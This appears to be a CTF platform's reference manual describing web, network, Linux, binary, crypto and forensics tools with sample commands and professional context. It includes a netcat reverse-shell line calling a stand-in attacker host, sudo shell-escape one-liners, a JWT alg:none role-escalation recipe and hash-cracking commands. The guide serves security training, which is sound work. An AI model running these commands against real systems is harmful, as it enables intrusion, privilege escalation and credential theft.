HACKNET // FIELD GUIDE ← Back to Platform
// HACKNET CTF — REFERENCE MANUAL v1.0
FIELD GUIDE
A reference manual for all tools, techniques, and challenge approaches used on this platform. Each tool is documented with real-world context — these aren't just CTF toys. Professional penetration testers, security researchers, and red teamers use all of these daily.
// TOOLS REFERENCE
Every tool a hacker needs — with real-world context beyond the CTF lab.

─── WEB HACKING ───────────────────────────────

curl WEB
A command-line HTTP client that sends requests and shows raw responses. Unlike a browser, curl gives you full control over headers, cookies, request bodies, and methods — and shows you exactly what the server returns, including status codes and raw headers.
curl https://target.com curl -X POST -d "user=admin&pass=x" url curl -H "Authorization: Bearer TOKEN" url curl -b "session=VALUE" url curl -v url                   # verbose (show headers)
// REAL WORLD   Used in every penetration test for quick API testing, sending crafted requests, and automating HTTP interactions. Bug bounty hunters use it to reproduce and report vulnerabilities. Also essential for calling internal APIs during SSRF and IDOR testing.
Burp Suite WEB
The industry-standard web application security testing platform. Acts as a proxy between your browser and the server, intercepting and modifying every HTTP request and response in real time. Includes an intruder (fuzzer), scanner, repeater, and decoder. The Community Edition is free.
Configure browser proxy → 127.0.0.1:8080 Intercept → modify request → Forward Send to Repeater → tweak → resend Send to Intruder → fuzz parameters
// REAL WORLD   Used in nearly every professional web application pentest. Security engineers use it for manual testing of authentication, session management, input validation, and access controls. The Intruder is used to brute-force login forms and enumerate endpoints. Essential for OWASP Top 10 testing.
DevTools WEB
Browser developer tools (F12) expose everything the browser receives and executes. The Network tab shows all HTTP requests including XHR and fetch. The Sources tab shows JavaScript files. The Console lets you execute JS. The Application tab shows cookies, localStorage, and IndexedDB.
F12 → Network → see all requests F12 → Sources → find JS files F12 → Application → Cookies → edit values Ctrl+U → view raw page source
// REAL WORLD   The first tool a web tester reaches for. Used to find hidden API endpoints, read JavaScript for hardcoded keys, modify cookies, and observe network traffic. Client-side JavaScript is never a security boundary — anything sent to the browser can be read and modified.
jwt.io WEB
A browser-based JWT (JSON Web Token) inspector and editor. Paste any JWT and it decodes the header and payload instantly. You can modify the payload and re-sign with a known secret. Understanding JWT structure is essential for auth bypass vulnerabilities like alg:none and key confusion attacks.
Paste JWT → read header.payload Change "alg":"HS256" → "alg":"none" Change "role":"user" → "role":"admin" Remove signature, keep trailing dot
// REAL WORLD   JWT vulnerabilities have led to critical breaches. The alg:none bypass, weak HS256 secrets (crackable with hashcat), and RS256→HS256 key confusion are real CVEs found in production systems. Always inspect JWTs in security reviews.

─── NETWORK ────────────────────────────────────

ssh NETWORK
Secure Shell — the standard protocol for remote terminal access to Linux/Unix systems over an encrypted channel. SSH replaced Telnet because it encrypts all traffic including passwords. Used by sysadmins, developers, and attackers alike once credentials are obtained.
ssh user@host ssh user@host -p 2222       # custom port ssh -i key.pem user@host    # key auth ssh user@host -L 8080:localhost:80 # port forward
// REAL WORLD   After gaining credentials via phishing, credential stuffing, or exploitation, attackers use SSH to establish persistence. SSH port forwarding is used to pivot through networks (tunnel internal services through a compromised host). Weak passwords and default credentials are still the #1 SSH attack vector.
nmap NETWORK
The most widely used port scanner and network discovery tool. Nmap sends crafted packets and analyses responses to determine open ports, running services, OS versions, and even specific software versions. It's the first tool run in any external or internal network pentest to map the attack surface.
nmap 192.168.1.1             # basic scan nmap -sV 192.168.1.1         # service versions nmap -sC -sV -p- target      # full scan + scripts nmap -sS -T4 10.0.0.0/24     # subnet SYN scan
// REAL WORLD   Every penetration test begins with reconnaissance. Nmap identifies what's exposed on the network — forgotten dev servers, exposed admin panels, misconfigured services. The NSE (Nmap Scripting Engine) can detect known vulnerabilities automatically.
netcat NETWORK
Called "the TCP/IP Swiss army knife." Netcat reads and writes raw data across TCP/UDP connections. It can act as a client, a server, a port scanner, or a file transfer tool. Most famously used to set up reverse shells — when an exploited machine connects back to the attacker's listener.
nc -lvnp 4444                # listen for connections nc target 80                 # connect to port bash -i >& /dev/tcp/attacker/4444 0>&1  # reverse shell nc -z target 1-1000          # port scan
// REAL WORLD   Reverse shells via netcat are the bread and butter of exploitation. After exploiting a web vulnerability (SSRF, RCE, command injection), attackers drop a reverse shell to gain interactive access. Security teams use it for incident response and network testing.

─── LINUX RECONNAISSANCE ───────────────────────

ps aux LINUX
Lists every running process on the system with its owner, PID, CPU/memory usage, and the full command used to start it. The full command line often reveals what scripts are running, what arguments were passed, and sometimes even credentials passed as arguments (a common developer mistake).
ps aux                        # all processes ps aux | grep python         # filter by name ps aux | grep root            # root-owned processes watch -n1 'ps aux'            # live refresh (spot cron jobs)
// REAL WORLD   Post-exploitation, attackers enumerate running processes to find services, databases, and applications to target next. Cron jobs and scheduled tasks are commonly found this way. Process command lines in /proc/PID/cmdline sometimes contain database passwords passed as flags.
find LINUX
Recursively searches the filesystem for files matching any criteria: name, owner, permissions, size, modification time, or file type. One of the most powerful post-exploitation recon tools. Can find SETUID binaries, world-writable files, recently modified files, and files owned by specific users.
find / -name "flag.txt" 2>/dev/null find / -perm -4000 2>/dev/null        # SETUID binaries find / -writable -type f 2>/dev/null   # writable files find /home -name ".*"                 # hidden files find / -newer /etc/passwd 2>/dev/null  # recent changes
// REAL WORLD   Finding SETUID binaries (-perm -4000) is a core privilege escalation technique. Misconfigurations like writable cron scripts owned by root, or custom SETUID binaries with vulnerabilities, are found this way. GTFOBins documents how to exploit common SETUID binaries.
sudo -l LINUX
Lists what commands the current user can run as root (or other users) via sudo, without needing the root password. Misconfigured sudo entries are one of the most common privilege escalation paths. GTFOBins (gtfobins.github.io) documents how to abuse allowed binaries to escalate privileges.
sudo -l                        # list sudo permissions sudo vim -c ':!/bin/bash'      # vim → shell sudo find / -exec /bin/bash \;  # find → shell sudo python3 -c 'import pty; pty.spawn("/bin/bash")'
// REAL WORLD   In real penetration tests, sudo -l is run immediately after gaining a shell. Sysadmins often give developers sudo access to specific tools without realising those tools can be abused to escape to a root shell. GTFOBins lists over 200 exploitable binaries.
ls -la LINUX
Lists directory contents with full details: permissions, owner, group, size, modification date, and filename — including hidden files (dotfiles starting with .). Permissions show who can read/write/execute each file, which is critical for understanding what's accessible.
ls -la                        # full listing + hidden ls -la /home/user/             # target directory ls -laR /etc/                  # recursive stat filename                  # detailed file metadata
// REAL WORLD   Hidden dotfiles (.env, .bash_history, .ssh/id_rsa, .config/) frequently contain credentials, API keys, and SSH private keys. Bash history files reveal past commands including passwords typed by the user. Always check hidden files when on a compromised system.
base64 LINUX
Encodes and decodes Base64 directly from the terminal. Base64 is not encryption — it's a reversible encoding that represents binary data as printable ASCII. It's everywhere: email attachments, JWTs, cookies, encoded files left on systems, and data passed between services.
base64 -d file.txt            # decode a file echo "SGVsbG8=" | base64 -d     # decode a string base64 file.bin                # encode to base64 cat secret | base64 -d | base64 -d  # multi-layer
// REAL WORLD   Attackers encode payloads, commands, and stolen data in Base64 to bypass basic content filters and log parsers that scan for plaintext keywords. Forensic analysts decode Base64-encoded files found on compromised systems to uncover hidden scripts, configuration files, and exfiltrated data.

─── BINARY ANALYSIS & REVERSING ────────────────

strings BINARY
Extracts all printable ASCII (and optionally Unicode) strings from any binary file. This is often the very first tool run on an unknown binary — within seconds you can see hardcoded passwords, URLs, error messages, function names, and file paths that give away the program's purpose and vulnerabilities.
strings binary                # extract all strings strings -n 8 binary           # min 8 chars (less noise) strings binary | grep -i pass  # filter for passwords strings binary | grep CTF      # find flags
// REAL WORLD   Malware analysts run strings as a first-pass triage step to identify C2 server URLs, mutex names, registry keys, and capabilities without executing the sample. Hardcoded credentials in compiled binaries are a common finding in application security assessments.
objdump BINARY
Disassembles compiled binaries into human-readable assembly code. Shows function addresses, instruction sequences, imported library calls, and binary metadata. Essential for reverse engineering and binary exploitation — it lets you understand what a program does without having the source code.
objdump -d binary             # disassemble all code objdump -d binary | grep -A10 '<main>' objdump -d binary | grep '<win>'  # find function address objdump -x binary             # all headers + sections
// REAL WORLD   Used in binary exploitation to find function addresses (for ret2win attacks), identify dangerous function calls (gets, strcpy, system), and understand program logic. Also used in vulnerability research to analyse patches and identify the exact change that fixed a CVE.
Ghidra BINARY
A free, open-source reverse engineering suite developed and released by the NSA. Ghidra decompiles binary code back into readable C-like pseudocode, making it possible to analyse complex programs without reading raw assembly. Supports x86, ARM, MIPS, and many other architectures. The industry-standard free alternative to IDA Pro.
Open binary → Auto-analyse → CodeBrowser Symbol Tree → Functions → find target function Decompiler window → read C pseudocode Search → Memory → find strings / bytes
// REAL WORLD   Used by malware analysts, vulnerability researchers, and CTF players to reverse engineer closed-source software. Government agencies, banks, and AV vendors use Ghidra to analyse malware. If you want to work in offensive security or malware research, learning Ghidra is essential.
gdb BINARY
The GNU Debugger — a command-line debugger for Linux binaries. Lets you run a program step-by-step, inspect register values, examine memory, set breakpoints, and manipulate execution flow. Indispensable for binary exploitation to verify payload offsets and understand crash behaviour. Install gdb-peda or pwndbg for a better interface.
gdb ./binary                  # start debugger run                            # run the program break *0x401136               # breakpoint at address info registers                # view all register values x/20wx $rsp                   # examine stack memory
// REAL WORLD   Exploit developers use gdb to find exact stack offsets for buffer overflows, verify that RIP/EIP was overwritten, and test shellcode. Security researchers use it to analyse crashes in vulnerability discovery. Every binary exploitation challenge on any CTF platform requires gdb knowledge.
pwntools PWN
A Python library purpose-built for binary exploitation. Handles connections (TCP, SSH, process), payload construction, packing addresses to little-endian, ROP chain building, and shellcode generation. Turns a manual exploit into a clean, repeatable Python script. Install with pip install pwntools.
from pwn import * p = process('./vuln')                 # local p = remote('host', port)              # remote payload = b'A'*72 + p64(win_addr)    # build overflow p.sendline(payload); p.interactive()
// REAL WORLD   pwntools is the standard exploit development library used in every serious CTF team and by professional vulnerability researchers. p64() packs a 64-bit address as little-endian bytes — critical for x86-64 return address overwrites. cyclic() generates de Bruijn sequences to find exact offsets automatically.

─── CRYPTO & PASSWORD ──────────────────────────

python3 CRYPTO
The hacker's scripting language of choice. Python's standard library includes everything needed for crypto work: base64, hashlib, struct (binary packing), binascii (hex), and socket (networking). For binary exploitation, pwntools is the go-to library. For rapid scripting, nothing beats a 3-line Python one-liner.
python3 -c "import base64; print(base64.b64decode('...'))" python3 -c "print(bytes([b^0x42 for b in [0x01,0x16]]))" python3 -c "import struct; print(struct.pack('<Q',0x401136))" python3 -c "print(bytes.fromhex('4354467b...'))"
// REAL WORLD   Python is the de-facto language of offensive security. Exploit frameworks like Metasploit use Ruby, but most custom exploits, automation scripts, and CTF solutions are written in Python. pwntools makes binary exploitation automation trivial — handling connections, payloads, and format strings.
CyberChef CRYPTO
Dubbed "the Cyber Swiss Army Knife," CyberChef is a browser-based tool developed by GCHQ for encoding, decoding, encryption, hashing, and data transformation. Its "Recipe" system lets you chain operations together — e.g., hex → base64 decode → ROT13 — without writing any code. Available online at gchq.github.io/CyberChef.
Drag operations to Recipe → chain transforms From Hex → From Base64 → ROT13 XOR → key: 42, scheme: Standard "Magic" operation → auto-detects encoding
// REAL WORLD   Used daily by CTF players, malware analysts, and threat intelligence teams to decode obfuscated payloads, decode C2 communications, and analyse data extracted from compromised systems. The "Magic" feature auto-detects unknown encodings — essential for unknown data encountered during incident response.
hashcat CRYPTO
The world's fastest password cracker, using GPU acceleration to test billions of hash combinations per second. Supports over 300 hash types (MD5, SHA1, SHA256, bcrypt, NTLM, etc.) and multiple attack modes: dictionary attacks with wordlists like rockyou.txt, brute force, and rule-based mutations.
hashcat -m 0 hash.txt rockyou.txt      # MD5 + wordlist hashcat -m 100 hash.txt rockyou.txt    # SHA1 hashcat -m 1000 hash.txt rockyou.txt   # NTLM (Windows) hashcat -m 0 -a 3 hash.txt ?d?d?d?d    # brute 4-digit PIN
// REAL WORLD   After obtaining a database dump in a breach, attackers crack password hashes to obtain plaintext credentials for credential stuffing on other platforms. Penetration testers use it in internal assessments after dumping the AD NTDS database. With a modern GPU, MD5 hashes crack in seconds.
john CRYPTO
John the Ripper — a classic, CPU-based password cracker that runs on virtually any system. While slower than hashcat's GPU acceleration, John excels at auto-detecting hash types and has extensive format support. Includes zip2john, pdf2john, and similar tools to extract crackable hashes from files.
john hash.txt --wordlist=rockyou.txt john --format=md5 hash.txt --wordlist=rockyou.txt zip2john secret.zip > zip.hash john zip.hash --wordlist=rockyou.txt john --show hash.txt                 # show cracked
// REAL WORLD   The *2john utilities (zip2john, pdf2john, keepass2john) make John the tool of choice when cracking encrypted files rather than raw hashes. Widely used in forensic investigations to recover passwords from encrypted evidence files and in pentesting to crack /etc/shadow hashes.
fcrackzip CRYPTO
A fast, dedicated ZIP password cracker that supports dictionary attacks and brute-force with configurable character sets and length ranges. Simpler and faster than John for pure ZIP cracking. When the search space is small (e.g. 4-digit PINs = 10,000 combinations) brute-force finishes in under a second.
fcrackzip -u -D -p rockyou.txt file.zip  # wordlist fcrackzip -u -b -c '0' -l 4-4 file.zip   # 4-digit PIN fcrackzip -u -b -c 'a' -l 3-6 file.zip   # lowercase brute # Python alternative: python3 -c "import zipfile; z=zipfile.ZipFile('f.zip'); [z.extractall(pwd=str(i).encode()) for i in range(10000)]"
// REAL WORLD   Forensic investigators and pentesters use fcrackzip when encountering password-protected ZIP archives on compromised systems or as evidence. Encrypted archives are common data exfiltration containers — cracking them can reveal what an attacker stole. Short numeric passwords are trivially brute-forced.

─── FORENSICS ──────────────────────────────────

exiftool FORENSICS
Reads, writes, and edits metadata embedded in files — especially photos (EXIF data). Modern cameras and smartphones embed GPS coordinates, device model, software version, timestamps, and custom fields into every photo. EXIF data has been used to locate whistleblowers, criminals, and even military positions.
exiftool image.jpg             # show all metadata exiftool -GPS* image.jpg       # show GPS fields only exiftool -Comment= image.jpg    # remove Comment field exiftool -all= image.jpg        # strip all metadata
// REAL WORLD   Journalists and OSINT investigators use exiftool to extract location data from published photos. In 2012, John McAfee was found because a Vice journalist's photo had GPS metadata. Defence: strip metadata before posting images publicly. Forensic investigators use it to verify photo timestamps in court cases.
xxd / hexdump FORENSICS
Displays the raw bytes of any file in hexadecimal format alongside the ASCII representation. Essential for identifying file types by their magic bytes (file signatures), finding hidden data, and analysing binary file formats. Every file format starts with characteristic magic bytes — knowing them is fundamental to forensics.
xxd file.bin                  # hex dump xxd file.bin | grep -A2 "4354 46"  # find CTF{ in hex xxd file.bin | head -4         # show magic bytes xxd -r hex.txt > binary        # hex back to binary
// REAL WORLD   Digital forensics investigators use hex viewers to identify file types (bypassing renamed extensions), recover deleted file fragments, and find hidden data appended to files. Malware analysts use it to examine packed/encrypted payloads byte-by-byte. Magic bytes: PDF=25 50 44 46, ZIP=50 4B 03 04, PNG=89 50 4E 47.
binwalk FORENSICS
Analyses binary files for embedded files and executable code. Originally designed for firmware analysis, binwalk scans binary blobs for known file signatures and can extract them automatically. It finds ZIP files, images, and executables hidden inside other files — the go-to tool for steganography and file carving challenges.
binwalk firmware.bin           # scan for embedded files binwalk -e firmware.bin        # extract all found files binwalk -Me firmware.bin       # recursive extraction binwalk --dd='.*' file         # extract everything
// REAL WORLD   IoT security researchers use binwalk to extract and analyse router/camera firmware — finding hardcoded credentials, private keys, and backdoors. Forensic analysts use it to recover files from disk images and memory dumps. Many high-profile IoT vulnerabilities were discovered by binwalking device firmware.
Audacity FORENSICS
Free, open-source audio editor with a spectrogram view that visualises frequencies over time. In audio steganography challenges, data is hidden visually in the spectrogram — visible only when you look at the frequency domain instead of the waveform. Also used in forensics to analyse suspicious audio, detect splice edits, and examine DTMF tones.
Open audio → View → Spectrogram Click track menu → Spectrogram Settings Set window size: 2048, scale: Linear Zoom in → look for visual patterns in frequency
// REAL WORLD   Audio forensics is used in legal cases to verify recording authenticity and detect tampering. Intelligence agencies analyse intercepted audio for hidden communication channels. Spectrogram steganography has been used in CTF challenges since the early 2000s and remains a popular technique.